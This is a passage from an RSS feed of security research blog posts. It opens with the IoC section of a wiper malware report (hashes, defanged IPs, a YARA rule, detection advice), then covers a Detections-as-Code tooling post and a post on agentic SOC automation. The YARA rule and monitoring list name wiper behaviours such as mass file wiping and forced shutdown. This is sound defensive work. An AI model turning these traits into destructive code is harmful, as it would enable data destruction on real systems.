<p>Behavioral protection, such as through canary files, provides a crucial layer of defense that can catch destructive malware regardless of its novelty.</p>
<h2>Indicators of Compromise</h2>
<h3>File Hashes (DYNOWIPER)</h3>
<table>
<thead>
<tr>
<th>SHA256</th>
<th>Filename</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>835b0d87ed2d49899ab6f9479cddb8b4e03f5aeb2365c50a51f9088dcede68d5</code></td>
<td>dynacom_update.exe</td>
</tr>
<tr>
<td><code>65099f306d27c8bcdd7ba3062c012d2471812ec5e06678096394b238210f0f7c</code></td>
<td>Source.exe</td>
</tr>
<tr>
<td><code>60c70cdcb1e998bffed2e6e7298e1ab6bb3d90df04e437486c04e77c411cae4b</code></td>
<td>schtask.exe</td>
</tr>
<tr>
<td><code>d1389a1ff652f8ca5576f10e9fa2bf8e8398699ddfc87ddd3e26adb201242160</code></td>
<td>schtask.exe</td>
</tr>
</tbody>
</table>
<h3>Distribution Scripts</h3>
<table>
<thead>
<tr>
<th>SHA256</th>
<th>Filename</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>8759e79cf3341406564635f3f08b2f333b0547c444735dba54ea6fce8539cf15</code></td>
<td>dynacon_update.ps1</td>
</tr>
<tr>
<td><code>f4e9a3ddb83c53f5b7717af737ab0885abd2f1b89b2c676d3441a793f65ffaee</code></td>
<td>exp.ps1</td>
</tr>
</tbody>
</table>
<h3>Network Indicators</h3>
<table>
<thead>
<tr>
<th>IP Address</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>185.200.177[.]10</code></td>
<td>VPN logins, direct DYNOWIPER execution</td>
</tr>
<tr>
<td><code>31.172.71[.]5</code></td>
<td>Reverse proxy for data exfiltration</td>
</tr>
<tr>
<td><code>193.200.17[.]163</code></td>
<td>VPN logins</td>
</tr>
<tr>
<td><code>185.82.127[.]20</code></td>
<td>VPN logins</td>
</tr>
<tr>
<td><code>72.62.35[.]76</code></td>
<td>VPN and O365 logins</td>
</tr>
</tbody>
</table>
<h3>YARA Rule</h3>
<pre><code class="language-yara">rule DYNOWIPER {  
    meta: 
        author = &quot;CERT Polska&quot;
        description = &quot;Detects DYNOWIPER data destruction malware&quot;  
        severity = &quot;CRITICAL&quot;  
        reference = &quot;https://mwdb.cert.pl/&quot;  
          
    strings:  
        $a1 = &quot;$recycle.bin&quot; wide  
        $a2 = &quot;program files(x86)&quot; wide  
        $a3 = &quot;perflogs&quot; wide  
        $a4 = &quot;windows\x00&quot; wide  
        $b1 = &quot;Error opening file: &quot; wide  
        $priv = &quot;SeShutdownPrivilege&quot; wide  
        $api1 = &quot;GetLogicalDrives&quot;  
        $api2 = &quot;ExitWindowsEx&quot;  
        $api3 = &quot;AdjustTokenPrivileges&quot;  
          
    condition:  
        uint16(0) == 0x5A4D  
        and filesize &lt; 500KB  
        and 4 of ($a*, $b1)  
        and $priv  
        and 2 of ($api*)  
}  
</code></pre>
<h2>Recommendations</h2>
<h3>Immediate Actions</h3>
<ol>
<li><strong>Deploy behavioral ransomware protection</strong> - Signature-based detection alone is insufficient against novel wipers</li>
<li><strong>Enable MFA on all VPN and remote access solutions</strong> - The attackers exploited accounts without MFA</li>
<li><strong>Audit FortiGate and edge device configurations</strong> - Check for unauthorized accounts, rules, and scheduled tasks</li>
<li><strong>Review default credentials</strong> - Industrial devices (RTUs, HMIs, serial servers) often ship with default passwords</li>
</ol>
<h3>Detection Opportunities</h3>
<p>Monitor for:</p>
<ul>
<li><code>GetLogicalDrives</code> API calls followed by mass file operations</li>
<li><code>SetFileAttributesW</code> calls setting <code>FILE_ATTRIBUTE_NORMAL</code> at scale</li>
<li>Privilege escalation for <code>SeShutdownPrivilege</code> followed by <code>ExitWindowsEx</code></li>
<li>GPO modifications creating scheduled tasks with SYSTEM privileges</li>
<li>Unusual file modifications across multiple drives simultaneously</li>
</ul>
<h3>Recovery Considerations</h3>
<ul>
<li><strong>Restore from offline/air-gapped backups</strong> - Online backups may have been targeted</li>
<li><strong>Verify backup integrity</strong> before restoration</li>
<li><strong>Assume credential compromise</strong> - Reset all passwords, especially domain admin accounts</li>
<li><strong>Audit all removable media</strong> that may have been connected to affected systems</li>
</ul>
<h2>Conclusion</h2>
<p>The December 2025 attacks on Poland's energy sector represent a significant escalation in destructive cyber operations against critical infrastructure. DYNOWIPER, while not technically sophisticated, proved effective at rapid data destruction when combined with the threat actor's extensive pre-positioned access.</p>
<p>The incident underscores the importance of defense-in-depth strategies, particularly behavioral detection capabilities that can identify destructive malware regardless of its novelty. Elastic Defend's ransomware protection—specifically its canary file monitoring—proved effective at detecting and blocking DYNOWIPER before it could complete its destructive mission.</p>
<p>Organizations in critical infrastructure sectors should review their security posture against the TTPs documented in this report and CERT Polska's comprehensive analysis.</p>
<hr />
<h2>References</h2>
<ul>
<li>CERT Polska: <a href="https://mwdb.cert.pl/">Energy Sector Incident Report – 29 December</a></li>
</ul>
<ul>
<li>Cisco Talos: <a href="https://blog.talosintelligence.com/static-tundra">Static Tundra</a></li>
<li>FBI IC3: <a href="https://www.ic3.gov/PSA/2025/PSA250820">PSA250820</a></li>
</ul>
<h2>MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>ID</th>
</tr>
</thead>
<tbody>
<tr>
<td>Execution</td>
<td>Scheduled Task/Job</td>
<td>T1053.005</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>File and Directory Permissions Modification</td>
<td>T1222</td>
</tr>
<tr>
<td>Discovery</td>
<td>Local Storage Discovery</td>
<td>T1680</td>
</tr>
<tr>
<td>Impact</td>
<td>Data Destruction</td>
<td>T1485</td>
</tr>
<tr>
<td>Impact</td>
<td>System Shutdown/Reboot</td>
<td>T1529</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/dynowiper/image1.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[The Engineer's Guide to Elastic Detections as Code]]></title>
            <link>https://www.elastic.co/security-labs/detection-as-code-timeline-and-new-features</link>
            <guid>detection-as-code-timeline-and-new-features</guid>
            <pubDate>Wed, 04 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This post details the latest evolution of Elastic Security's Detections as Code (DaC) framework, including its development timeline, current feature highlights, and tailored implementation examples.]]></description>
            <content:encoded><![CDATA[<p>In an ever-evolving threat landscape, security operations are reaching a tipping point. As the velocity and complexity of threats increase, teams expand and managed environments multiply. Commonly, manual approaches to rule management become a bottleneck. This is where Detections as Code (DaC) steps in, not just as a tool, but as a methodology.</p>
<p>DaC as a methodology applies software development practices to the creation, management, and deployment of security detection rules. By treating detection rules as code, it enables version control, automated testing, and deployment processes, enhancing collaboration, consistency, and agility in response to threats. DaC streamlines the detection rule lifecycle, ensuring high-quality detections through peer reviews and automated tests. This methodology also supports compliance with change management requirements and fosters a mature security posture.</p>
<p>That's why we’re excited to share the latest updates to Elastic's <a href="https://github.com/elastic/detection-rules">detection-rules</a>, our open repository for writing, testing, and managing security detection rules in Elastic, that also allows you to create your own <a href="https://dac-reference.readthedocs.io/en/latest/">Detections as Code (DaC) framework</a>. Continue reading for highlighted implementation examples using extended functionality, and the announcement of Elastic's free Detections as Code Workshop.</p>
<h1>Elastic Security DaC: The journey from alpha to general availability</h1>
<p>With the functionality now provided in <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository, users can manage all their detection rules as code, review rule tunings, automatically test and validate rules, and automate rules deployment across their environments.</p>
<h2>Pre-2024: Elastic’s internal use of DaC</h2>
<p>Elastic threat research and detection engineering team created and used the <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository to develop, test, manage and release prebuilt rules, following DaC principles - reviewing rules as a team, automating their tests and release. The repository also has an interactive CLI to create rules, so engineers could start working on the rules right there.</p>
<p>As the security community's interest in as-code principles grew, and the available Elastic Security APIs already allowed users to implement their custom Detections as code solutions, Elastic decided to extend the <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository functionality to enable our users to benefit from our tooling and aid them in creating their DaC processes.</p>
<p>Here are the key milestones of Elastic’s user-focused DaC development from alpha to general availability.</p>
<h2>May 2024: Alpha release of new &quot;roll your own” features</h2>
<p>Our detection-rules repository is adjusted for customer use, allowing for managing custom rules, adapting the test suite for user needs, and allowing for management of actions and exceptions alongside the rules.</p>
<p>Key additions:</p>
<ul>
<li>Custom rules directory support</li>
<li>Select which test to run based on your requirements</li>
<li><a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/rule-exceptions">Exceptions</a> and Actions support</li>
</ul>
<p>We also published an extensive <a href="https://dac-reference.readthedocs.io/en/latest/">guidance</a> for Detections as Code with examples of implementation with Elastic Security using <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository.</p>
<h2>August 2024: &quot;Roll your own” features now beta</h2>
<p>The functionality is extended to allow import and export of custom rules between Elastic Security and repository, more configuration options and versioning functionality extended to custom rules.</p>
<p>New features added:</p>
<ul>
<li>Bulk import/export of custom rules (based on Elastic Security APIs)</li>
<li>Fully configurable unit test, validation, and schemas</li>
<li>Version lock for custom rules</li>
</ul>
<h2>March - August 2025: are generally available and supported</h2>
<p>Using DaC with Elastic Security 8.18 and up:</p>
<ul>
<li><a href="https://www.elastic.co/guide/en/security/8.18/whats-new.html#_customize_and_manage_prebuilt_detection_rules">Supports prebuilt rules management</a>. You can export all prebuilt rules from Elastic Security and store them alongside your custom rules.</li>
<li>Support for rules filtering for export added.</li>
</ul>
<p>Adjacent to DaC efforts, we also released new Terraform resources (<a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.12.0">V0.12.0</a>  and <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.13.0">V0.13.0</a>) in October-December 2025, allowing Terraform users to manage detection rules and exceptions.</p>
<p>With this foundation spelled out, let's explore the powerful features that are available to streamline your detection engineering process.</p>
<h1>Detection-rules DaC functionality highlights</h1>
<p>There are a few worthwhile additions since our <a href="https://www.elastic.co/security-labs/dac-beta-release">last DaC publication</a>, which we’ll expand on below.</p>
<h2>Additional filters</h2>
<p>The <a href="https://github.com/elastic/detection-rules/blob/main/CLI.md#exporting-rules">filter functionality</a> available when exporting rules from Kibana has been extended to allow you to precisely define which rules to sync in DaC. Here are the new flags:</p>
<table>
<thead>
<tr>
<th align="center">Flag</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center"><strong>-cro</strong></td>
<td>Filters the export to only include rules created by the user (not Elastic prebuilt rules).</td>
</tr>
<tr>
<td align="center"><strong>-eq</strong></td>
<td>Applies a query filter to the rules being exported.</td>
</tr>
</tbody>
</table>
<p>Let’s take an example of when you wish to organize rules by data source, and want to export the AWS rules to a specific folder. In this case, let’s use filtering on tags for data sources and export all rules with the <code>Data Source AWS</code> tag:</p>
<pre><code>python -m detection_rules kibana export-rules -d dac_test/rules #add rules to the dac_test/rules folder
-sv #strip the version fields from all rules
-cro #export only custom rules
-eq &quot;alert.attributes.tags: &quot;Data Source: AWS&quot;&quot; # export only rules with &quot;Data Source: AWS&quot; tag
</code></pre>
<p>See Kibana documentation for <a href="https://www.elastic.co/docs/api/doc/kibana/operation/operation-performrulesbulkaction#operation-performrulesbulkaction-body-application-json-query">query string filtering</a> for the underlying API call used here and the <a href="https://www.elastic.co/docs/api/doc/kibana/operation/operation-findrules">list all detection rules API call</a> for example available fields to construct the query filter.</p>
<h2>Custom folder structure</h2>
<p>In the detection-rules repo, we use a folder structure based on platform, integration, and MITRE ATT&amp;CK information. This helps us with our organization and rule development. This is by no means the only method of organization. You may want to organize your rules by customer, date, or source as examples. This will vary greatly depending on your use case.</p>
<p>Whether you use this export process or manual organization, once you have your rules in a location or folder structure that you like, you can now keep this local structure even when re-exporting rules. It is important to note that the new rules need to be placed in their desired location manually. The local rule-loading mechanism detects where the rules are placed in order to know where to put them. If the rule is not there, it will then use the specified output directory to place the new rule(s). To use the local rule loading for updating existing rules use the <code>--load-rule-loading / -lr</code> flag for the <code>kibana export-rules</code> and <code>import-rules-to-repo</code> commands. These flags enable you to make use of the local folders specified in your <code>config.yaml</code>.</p>
<p>Let’s look at example with the rules organised in folders the following way:</p>
<p><code>rule_dirs:</code><br />
<code>- rules</code><br />
<code>my_test_rule.toml</code><br />
<code>- another_rules_dir</code><br />
<code>high_number_of_process_and_or_service_terminations.toml</code></p>
<p>We’ll specify the following in the <code>config.yaml</code> file:</p>
<p><code>rule_dirs:</code><br />
<code>- rules</code><br />
<code>- another_rules_dir</code></p>
<p>With the new <code>-lr</code> option, rule updates from Kibana will now use these additional paths instead of exporting directly to the specified directory.</p>
<p>Running <code>python -m detection_rules kibana --space test_local export-rules -d dac_test/rules/ -sv -ac -e -lr,</code>will export rules from <code>test_local</code>  space,  <code>my_test_rule.toml</code> will be written to dac_test/rules/ as it was already on disk there and <code>high_number_of_process_and_or_service_terminations.toml</code> will be written to <code>dac_test/another_rules_dir/.</code></p>
<p>This can be particularly useful if you have the same rules in different sub-folder configurations for different customers. For example, let’s say you have your rules broken down by platform and integration similar to Elastic’s prebuilt rule folder structure. For your customers, SOCs, or threat-hunting teams, having the rules organized underneath these platform/integration folders may be the most useful mechanism for them to manage the rules. However, your information security team or primary detection engineering team may want to manage the rules by initiative or rule author instead so that all the rules a particular individual or team is responsible for are organized in one place. Now with the local rule-loading flags, you can simply have two configuration files and the duplicated rules in each structure. When you are exporting updates for the rules, you would then use the environment variable to select the appropriate configuration file and export the rule updates. These updates will then be applied to the rules in place, maintaining the directory structure.</p>
<h2>Miscellaneous local loading updates</h2>
<p>In addition to the above, we have added two smaller new features designed to help users who are adding local information in the detection rules TOML files and schema. These are as follows:</p>
<ol>
<li>Local date support from the local files where the local date will be maintained from the original file</li>
<li>Upgrades to the auto gen feature to inherit known types from existing schema.</li>
</ol>
<p>The local date component can be useful when one wants more manual control over the date field in the file. Without using the override, the date will be based on when the Kibana rule contents were exported. Using the <code>--local-creation-date</code> flag, the date will not be updated when the file contents are re-exported.</p>
<p>The automatic schema generation has been updated to inherit the types from other indices/integrations if they are present. This provides a potentially more accurate schema, as well as reducing the need for manual updates after the fact. For example, you have a rule that uses the index “new-integration*” with the following fields:</p>
<ul>
<li><code>host.os.type.new_field</code></li>
<li><code>dll.Ext.relative_file_creation_time</code></li>
<li><code>process.name.okta.thread</code></li>
</ul>
<p>Instead of each of these fields being added to the schema with a default type, their types are inherited from existing schemas. In this case, the types for <code>dll.Ext.relative_file_creation_time</code> and <code>process.name.okta.thread</code> are inherited.</p>
<pre><code>{
  &quot;new-integration*&quot;: {
    &quot;dll.Ext.relative_file_creation_time&quot;: &quot;double&quot;,
    &quot;host.os.type.new_field&quot;: &quot;keyword&quot;,
    &quot;process.name.okta.thread&quot;: &quot;keyword&quot;
  }
}
</code></pre>
<p>To see how to use this with your custom data types, see the <a href="#Custom-schemas-usage">Custom schemas usage</a> section within the Implementation examples part of this blog.</p>
<h1>Expanding on usage examples</h1>
<p>Below you will find more examples of DaC implementations, these are not focused on new functionality additions, but go deeper on the topics we see discussed in the community.</p>
<p>It’s worth noting that Detections as Code features are provided as components that can be used to build a custom implementation for your chosen process and architecture. When implementing DaC in your production environment, treat it as an engineering process and follow <a href="https://dac-reference.readthedocs.io/en/latest/dac_concept_and_workflows.html#best-practices">the best practices.</a></p>
<h2>DaC implementation with Gitlab</h2>
<p>When we look at implementations of DaC typically this revolves around using some form of CI/CD product to automatically perform rule management based on a given trigger. These triggers vary considerably based on the desired setup, specifically the authoritative source of rules and the desired state of your version control system (VCS). For a much more in-depth exploration of some of these considerations, see our <a href="https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html">DaC Reference Material</a>. Below is a simple example using Gitlab as VCS provider and using its in-built CI/CD via Gitlab Actions.</p>
<pre><code>stages:                # Define the pipeline stages
  - sync               # Add a 'sync' stage

sync-to-production:    # Define a job named 'sync-to-production'
  stage: sync          # Assign this job to the 'sync' stage
  image: python:3.12   # Use the Python 3.12 Docker image
  variables:
    CUSTOM_RULES_DIR: $CUSTOM_RULES_DIR    # Set custom rules env var
  script:                                  # List of commands to run 
    - python -m pip install --upgrade pip  # Upgrade pip
    - pip cache purge                      # Clear pip cache
    - pip install .[dev]                   # Install package w/ dev deps
    - |  # Multi-line command to import rules                                        
      FLAGS=&quot;-d ${CUSTOM_RULES_DIR}/rules/ --overwrite -e -ac&quot;
      python -m detection_rules kibana --space production import-rules $FLAGS
  environment:
    name: production   # Specify deployment environment as 'production'
  only:
    refs:
      - main           # Run this job only on the 'main' branch
    changes:
      - '**/*.toml'    # Run this job only if .toml files have changed

</code></pre>
<p>This is very similar to other inbuilt CI/CD from other Git-based VCS like Gitlab and Gitea. The main difference being in the syntax determining the triggering event. The DaC commands such as <code>kibana import-rules</code> would be the same regardless of VCS. In this example, we are syncing rules from our fork of the detection-rules repo to our Kibana Production Space. This is based on a number of prior decisions being made, for instance requiring unit tests to pass before merging rule updates and that rules on main being ready for prod. For a Github-based walkthrough of these considerations for this particular approach, please take a look at our <a href="https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#demo-video">demo video</a>.</p>
<h2>Custom Unit Testing tips and examples</h2>
<p>When considering DaC as a capability to add to your detection toolkit, setting up the CI/CD and base infrastructure should be considered as the first step in an ongoing process to improve the quality and usefulness of your rules. One of the key purposes in having “as code” tooling is adding the ability to further customize tooling to your needs and environment.</p>
<p>One example of this is unit testing for rules. Beyond base functionality testing, some other key existing unit tests enforce Elastic-specific considerations around rule performance and optimization, as well as organization of metadata and tagging. This helps detection engineers and threat researchers remain consistent in their rule development. Building on this example, one may want to consider adding custom unit tests based on your specific needs.</p>
<p>To illustrate this, take a Security Operations Center (SOC) environment where there are a number of analysts responsible for various different domains and tasks. When an alert is raised in the SIEM, it may not be immediately obvious who should handle remediation, or what team(s) need to be informed of the incident. Tagging the rules with a team tag: e.g. <code>Team: Windows Servers</code> similarly to how Elastic uses tags for data sources, can provide the SOC with a point of contact directly in the alert for who can help with remediation.</p>
<p>In our DaC environment, we can quickly create a new testing module to enforce this on all of the custom rules (or pre-built too). For this test, we are going to enforce having a <code>Team: &lt;some name&gt;</code> tag on all production rules that are not authored by Elastic. In the detection-rules repo, our testing is handled through the Python test suite called <code>pytest</code> and as such unit tests are organized into python modules (files) and subsequent classes and functions in these files under the <code>tests/</code> folder. To add tests simply either add classes or functions to the existing files or create a new one. In general, we recommend creating new test files so that you can receive updates to the existing tests from Elastic without having to merge the differences.</p>
<p>We will start by creating a new python file called <code>test_custom_rules.py</code> in the <code>tests/</code> directory with the following contents:</p>
<pre><code class="language-py"># test_custom_rules.py

&quot;&quot;&quot;Unit Tests for Custom Rules.&quot;&quot;&quot;

from .base import BaseRuleTest


class TestCustomRules(BaseRuleTest):
    &quot;&quot;&quot;Test custom rules for given criteria.&quot;&quot;&quot;

    def test_custom_rule_team_tag(self):
        &quot;&quot;&quot;Unit test that all custom rules have a Team: &lt;team_name&gt; tag.&quot;&quot;&quot;
        tag_format = &quot;Team: &lt;team_name&gt;&quot;
        for rule in self.all_rules:
            if &quot;Elastic&quot; not in rule.contents.data.author:
                tags = rule.contents.data.tags
                if tags:
                    self.assertTrue(
                        any(tag.startswith(&quot;Team: &quot;) for tag in tags),
                        f&quot;Custom rule {rule.contents.data.rule_id} does not have a {tag_format} tag&quot;,
                    )
                else:
                    raise AssertionError(
                        f&quot;Custom rule {rule.contents.data.rule_id} does not have any tags, include a {tag_format} tag&quot;
                    )
</code></pre>
<p>Now each non-Elastic rule will be required to have a tag in the specified pattern for a team responsible for remediation. E.g. <code>Team: Team A.</code></p>
<h2>Custom schemas usage</h2>
<p>Elastic’s ability to bring your own data types also extends to our DaC capabilities. For example, let’s take a look at some custom schemas for network protocols. Diverse data you have in your stack can of course be queried by your rules, and we will also want to leverage the applicable validation and testing for any custom rules on these data types too. This is where Custom schemas come in handy.</p>
<p>When we are validating queries, the query is parsed into the respective fields and the types of these fields are compared against what is provided in a given schema (e.g. <a href="https://www.elastic.co/docs/reference/ecs/ecs-field-reference">ECS schema</a>, the AWS Integration for AWS data, etc.). For custom data types, this follows the same validation path, with the ability to pull from locally defined custom schemas. These schema files can be built by hand as one or more json files; however, if you have some sample data already in your stack, you can take advantage of this and use it as validation and generate your schemas automatically.</p>
<p>Assuming you already have a custom rules folder configured (if not see instructions), you can turn on automatic schema generation by adding <code>auto_gen_schema_file: &lt;path_to_your_json_file&gt;</code> to your config file. This will generate a schema file in the specified location that will be used to add entries for each field and index combination. The file will be updated during any command where rule contents are validated against a schema, including import-rules-to-repo, kibana export-rules, view-rule, and others. This will also automatically add it to your stack-schema-map.yaml file when using a custom rules directory and config.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/detection-as-code-timeline-and-new-features/image1.gif" alt="" /></p>
<p>With this power comes an increased responsibility on rule reviewers as any field used in the query is immediately assumed to be valid and added to the schema. One way to mitigate risk is to utilize a development space that has access to the data. In the PR, one can then link to a successful execution of the query with stack level validation on its data types. Once this is approved, one can remove the <code>auto_gen_schema_file</code> addition to the config and you now have a known valid schema based on your custom data. This provides a baseline for other rule authors to build upon as needed and maintains the type checking validation.</p>
<h1>Learn more about DaC and try it yourself</h1>
<p>You can experience Elastic Security's Detections as Code (DaC) functionality firsthand with our interactive <a href="https://play.instruqt.com/elastic/invite/uqlknuayvxhy">Instruqt training</a>. This training provides a straightforward way to explore core DaC features in a pre-configured test environment, eliminating the need for manual setup. Give it a try!</p>
<p>If you are implementing DaC, share your experience, ask your questions and help others on the community slack <a href="https://elasticstack.slack.com/archives/C06TE19EP09">DaC channel</a>.</p>
<h2>Trial Elastic Security</h2>
<p>To experience the full benefits of what Elastic has to offer for detection engineers, start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a>. Visit <a href="https://www.elastic.co/security">elastic.co/security</a> to learn more.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/detection-as-code-timeline-and-new-features/image2.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[From Alert Fatigue to Agentic Response: How Workflows and Agent Builder Close the Loop]]></title>
            <link>https://www.elastic.co/security-labs/from-alert-fatigue-to-agentic-response</link>
            <guid>from-alert-fatigue-to-agentic-response</guid>
            <pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Attempting to chase individual alerts is a losing strategy. To succeed, we have to move beyond simple automation scripts and into the era of Agentic AI.]]></description>
            <content:encoded><![CDATA[<p>SOC leaders face a daily battle against basic math that doesn’t add up. Data volumes are growing exponentially, attack surfaces are expanding globally, yet your team’s capacity remains linear. You cannot hire your way out of this problem.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-alert-fatigue-to-agentic-response/image2.png" alt="Line chart demonstrating exponential increase in data, alerts, insights and linear increase in human capacity" /></p>
<p>Attempting to chase individual alerts is a losing strategy. To succeed, we have to move beyond simple automation scripts and into the era of Agentic AI.</p>
<p>At Elastic, we view the modern security operation as an operational nervous system. It needs Senses (the data foundation to see everything), a Brain 🧠(AI driven analytics to find the signal in the noise), and Hands 🙌(Workflows to execute actions and drive outcomes).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-alert-fatigue-to-agentic-response/image1.png" alt="" /></p>
<p>With the introduction of Agent Builder and Elastic Workflows, we are unifying these elements. We aren't just giving you a chatbot; we are giving you the ability to construct an autonomous SOC where agents reason over data and workflows execute sophisticated actions—bidirectionally.</p>
<p>Here is how these two powerful engines work together to transform your security operations.</p>
<h2>The Power of &quot;Brain&quot; and &quot;Hands&quot; Working Together</h2>
<p>To understand why this combination is significant, we must differentiate their roles.</p>
<ul>
<li><strong>Elastic Workflows (The Hands):</strong> These are deterministic. They are perfect for rigid, repeatable processes—&quot;If X happens, create a Jira ticket, ping Slack, and isolate the host.&quot; They provide structure, auditability, and reliability.</li>
<li><strong>Agent Builder (The Brain):</strong> Agents are probabilistic and reasoning-based. They perceive the environment, plan a sequence of steps, and adapt. An agent can look at a vague threat report and decide <em>which</em> queries to run to find evidence.</li>
</ul>
<p><strong>The magic happens when they interact:</strong> Previously, you had to choose between a rigid playbook or a manual investigation. Now, <strong>Workflows can invoke Agents</strong> to perform complex analysis during an automation loop, and <strong>Agents can invoke Workflows</strong> as tools to perform reliable, heavy-lifting actions during a chat.</p>
<h2>What This Isn't</h2>
<p>Let's be clear: this isn't about replacing your analysts. It's about removing the toil that keeps them from doing the work that actually matters - the creative, adversarial thinking that no model can replicate. The goal is to shift your team from being reactive log-chasers to proactive threat hunters. The agent handles the grunt work; your people handle the judgment calls.</p>
<h2>Use Case: Automated Triage at Alert Time</h2>
<p><em>From Alert to Analysis without Human Intervention</em></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-alert-fatigue-to-agentic-response/image6.png" alt="" /></p>
<p>Let’s look at a real-world scenario involving a ransomware attack (ex: <em>BlackCat/ALPHV</em> - a ransomware-as-a-service operation). In a traditional setup, an alert fires, and an analyst spends 30 minutes gathering logs, checking virus totals, and writing a summary.</p>
<p>With Elastic, this entire triage phase is automated before the analyst opens their laptop, reducing mean-time-to-triage from 30 minutes to under 2 minutes.</p>
<p><strong>The Workflow:</strong></p>
<ol>
<li><strong>Trigger:</strong> <strong>Attack Discovery</strong> runs on a schedule and correlates 15 disparate alerts into a single, high-fidelity Attack Chain.</li>
<li><strong>Workflow Step (Enrichment):</strong> The workflow is triggered automatically and loops through every entity involved—hosts, users, file hashes. It runs a lookup against threat intel sources like VirusTotal.</li>
<li><strong>Workflow Step (Invoke Agent):</strong> The workflow passes this bundle of data to a specific <strong>&quot;Triage Agent.&quot;</strong></li>
<li><strong>Agent Execution:</strong> The agent doesn't just copy-paste data. It <em>reasons</em> over the attack chain, compares it against the MITRE ATT&amp;CK framework, correlates related logs, and generates a human-readable investigation summary tailored for a Tier 2 analyst.</li>
<li><strong>Outcome:</strong> The workflow posts this AI-generated analysis directly into a new Case, complete with severity scoring, deep dive investigation, root cause analysis, and recommended next steps.</li>
</ol>
<p><strong>User Impact:</strong> The analyst starts their day reviewing a fully contextualized case, not chasing raw logs.</p>
<h2>Use Case: The &quot;Human-in-the-Loop&quot; Investigation</h2>
<p><em>Turning Natural Language into Deterministic Action</em></p>
<p>Once an analyst is investigating, they often need to perform administrative tasks that break their flow like finding out who is on-call, setting up war rooms, or notifying leadership.</p>
<p>In Elastic Security, the analyst stays in the chat interface. Because we allow you to define Workflows as <strong>Tools</strong> for your agents, the analyst can simply ask the agent to handle the logistics.</p>
<p><strong>The Workflow:</strong></p>
<ol>
<li><strong>Analyst Prompt:</strong> <em>&quot;We have a confirmed incident. Who is on call? Please create a Slack channel for this incident and invite them.&quot;</em></li>
<li><strong>Agent Reasoning:</strong> The agent recognizes the intent matches a &quot;Incident Response Setup&quot; workflow tool you have pre-configured.</li>
<li><strong>Workflow Execution:</strong>
<ul>
<li>Step 1: Queries the PagerDuty integration to find the on-call engineer.</li>
<li>Step 2: Calls the Slack API to create a channel named <code>#incident-[id]</code>.</li>
<li>Step 3: Posts the initial case summary into that channel.</li>
</ul>
</li>
<li><strong>Outcome:</strong> The agent confirms to the analyst: <em>&quot;I have created channel #incident-982 and added Jane Doe (On-Call) to the channel.&quot;</em></li>
</ol>
<h2>Use Case: Guided Remediation and Containment</h2>
<p><em>Precision Response at Speed</em></p>
<p>When it is time to contain a threat, speed is critical, but so is safety. You don't want an LLM &quot;hallucinating&quot; an API call to a firewall. This is where the Agent + Workflow combination shines for safety.</p>
<p><strong>The Workflow:</strong></p>
<ol>
<li><strong>Analyst Prompt:</strong> <em>&quot;Isolate the host involved in the BlackCat alert.&quot;</em></li>
<li><strong>Agent Reasoning:</strong> The agent identifies the <code>host123</code> host from the context of the investigation. It creates a plan to invoke the &quot;Host Isolation&quot; workflow.</li>
<li><strong>Decision Point:</strong> The Agent presents the plan to the user: <em>&quot;I am about to trigger the 'Isolate Host' workflow for host123 via Elastic Defend.&quot;</em></li>
<li><strong>Workflow Execution:</strong> The deterministic workflow executes the isolation command via Elastic Defend (XDR), ensuring the action is logged and performed exactly as defined by your engineering team.</li>
<li><strong>Outcome:</strong> The host is isolated immediately.</li>
</ol>
<p><strong>User Impact:</strong> You get the ease of natural language interaction with the safety and audit trails of hard-coded automation.</p>
<p>We are moving away from a world where you have to choose between flexible AI chat and rigid SOAR playbooks. The future is an Autonomous SOC where the two are inextricably linked.</p>
<p>By using Agent Builder to create custom agents that understand your specific environment (using RAG with your own data) and equipping them with Elastic Workflows as tools, you effectively multiply your team's capacity and scale expertise. You are not just deploying a chatbot; you are deploying a virtual team member that knows your runbooks, respects your permissions, and works 24/7.</p>
<p>For more detailed information on getting started with Agent Builder read this <a href="https://www.elastic.co/search-labs/blog/ai-agent-builder-elasticsearch">blog</a>.</p>
<p>Agent Builder and Workflows are available now as a tech preview. Get started with an <a href="https://cloud.elastic.co/registration">Elastic Cloud Trial</a>, and check out the documentation for Agent Builder <a href="https://www.elastic.co/docs/solutions/search/elastic-agent-builder">here</a>, and Workflows <a href="https://cloud.elastic.co/registration">here</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/from-alert-fatigue-to-agentic-response/photo-edited-03.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[From Qradar to Elastic: Automate your Detection Rule Migration]]></title>
            <link>https://www.elastic.co/security-labs/from-qradar-to-elastic</link>
            <guid>from-qradar-to-elastic</guid>
            <pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate>
